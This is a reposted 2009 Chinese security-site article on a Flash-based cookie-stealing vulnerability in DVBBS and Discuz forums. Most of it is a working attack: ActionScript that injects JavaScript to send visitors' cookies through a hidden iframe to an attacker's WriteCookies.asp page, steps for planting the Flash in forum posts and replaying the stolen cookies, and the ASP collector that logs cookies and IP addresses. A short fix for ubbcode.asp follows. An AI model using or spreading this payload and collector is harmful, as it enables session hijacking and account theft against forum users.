您没有来错地!为了更好的发展黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

DVBBS等论坛存在的Cookies偷取漏洞

2009-2-4 09:33| 投稿: security

摘要: 作者:xjyown   来自:朋友的家论坛 ◇ 此漏洞所涉及版本::DVBBS、Discus所有版本,其它论坛未作测试,相信大多数都存在该漏洞 ◇ 描述:由于DVBBS等论坛对...
作者:xjyown   来自:朋友的家论坛 ◇ 此漏洞所涉及版本::DVBBS、Discus所有版本,其它论坛未作测试,相信大多数都存在该漏洞 ◇ 描述:由于DVBBS等论坛对Flash采取直接播放形式,导致攻击者可以利用Flash嵌入一段javascript代码,达到偷取用户Cookies的目的 ◇ 具体分析与利用:1. 首先准备好一个可以运行ASP的空间,用来存放Cookies2. 新建一个Flash动画,加入如下代码:onClipEvent (load) {url="javascript:var rng=document.selection.createRange();rng.pasteHTML(\"<iframe name=frame_hide style='display:none'></iframe><img src=\\\"./images/logo.gif\\\" style=\\\"display:none\\\" onload=\\\"javascript:co=documents.cookie;document.all.frame_hide.src='http://存放路径/WriteCookies.asp?Cookies='+co.split('&');var e=document.all;for(var i=0;i<e.length;i++){if(e(i).tagName=='A'){var ss=e(i).outerHTML;}}\\\">\");"getURL(url);}利用iframe是为了让其它人查觉不到程序的页面跳转3. 将Flash导出****文件,插入到想要偷取Cookies的论坛上,加入代码[全屏欣赏]http://Flash地址 (注,有些论坛是****][****])4. 这样,如果有用户进到贴子里面,javascript程序就会把该用户的Cookies送到WriteCookies.asp,保存到数据库5. 至于Cookies欺骗,推荐使用IECookiesView,很多教程都有介绍,在这里就不多说了 ◇ 备注1. 对于禁用Flash的论坛,还可以利用PNG格式的图片嵌入代码偷取2. 拿到Cookies后,密码是经MD5算法加密过的字符串,如果你喜欢用暴力的话,可以试试去解码,当然,个人是不推荐这种方法的 ◇ 解决方案:1. 禁用Flash,或将Flash改为链接格式,以动网为例,修改INC/ubbcode.asp文件 找到下面两段re.Pattern="(\[FLASH\])(.[^\[]*)(\[\/FLASH\])"strContent= re.Replace(strContent,"<a href=""$2"" TARGET=_blank><IMG SRC=/uploadfile/200902/20090204011847849.gif border=0 alt=点击开新窗口欣赏该FLASH动画! height=16 width=16>[全屏欣赏]</a><OBJECT codeBase=http://download.macromedia.com/pub/shockwave/cabs/flash****lash.cab#version=4,0,2,0 classid=clsid:D27CDB6E-AE6D-11cf-96B8-444553540000 width=500 height=400><PARAM NAME=movie value=""$2""><PARAM NAME=quality value=high><embed src=""$2"" quality=high pluginspage='http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash' ;type='application/x-shockwave-flash' width=500 height=400>$2</embed></OBJECT>") re.Pattern="(\[FLASH=*([0-9]*),*([0-9]*)\])(.[^\[]*)(\[\/FLASH\])"strContent= re.Replace(strContent,"<a href=""$4"" TARGET=_blank><IMG SRC=/uploadfile/200902/20090204011847849.gif border=0 alt=点击开新窗口欣赏该FLASH动画! height=16 width=16>[全屏欣赏]</a><OBJECT codeBase=http://download.macromedia.com/pub/shockwave/cabs/flash****lash.cab#version=4,0,2,0 classid=clsid:D27CDB6E-AE6D-11cf-96B8-444553540000 width=$2 height=$3><PARAM NAME=movie value=""$4""><PARAM NAME=quality value=high><embed src=""$4"" quality=high pluginspage='http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash' ;type='application/x-shockwave-flash' width=$2 height=$3>$4</embed></OBJECT>") 改为re.Pattern="(\[FLASH\])(.[^\[]*)(\[\/FLASH\])"strContent= re.Replace(strContent,"<a href=""$2"" TARGET=_blank><IMG SRC=/uploadfile/200902/20090204011847849.gif border=0 height=16 width=16>[点击打开该Flash文件]</a>") re.Pattern="(\[FLASH=*([0-9]*),*([0-9]*)\])(.[^\[]*)(\[\/FLASH\])"strContent= re.Replace(strContent,"<a href=""$4"" TARGET=_blank><IMG SRC=/uploadfile/200902/20090204011847849.gif border=0 height=16 width=16>[点击打开该Flash文件]</a>") 2. 至于PNG图片的问题,留给写论坛的人自己去解决吧 ◇ 附:保存Cookies的简单ASP代码,如果想要加上其他功能,自己稍为修改一下就行了。Set conn=Server.CreateObject("ADODB.Connection")conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq="& Server.MapPath("CookiesLog.mdb")Cookies=request("Cookies")IP=request.serverVariables("remote_host")sql="insert into co(Cookies,IP) values('"&Cookies&"','"&IP&"')"conn.execute(sql)set conn=nothing  

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部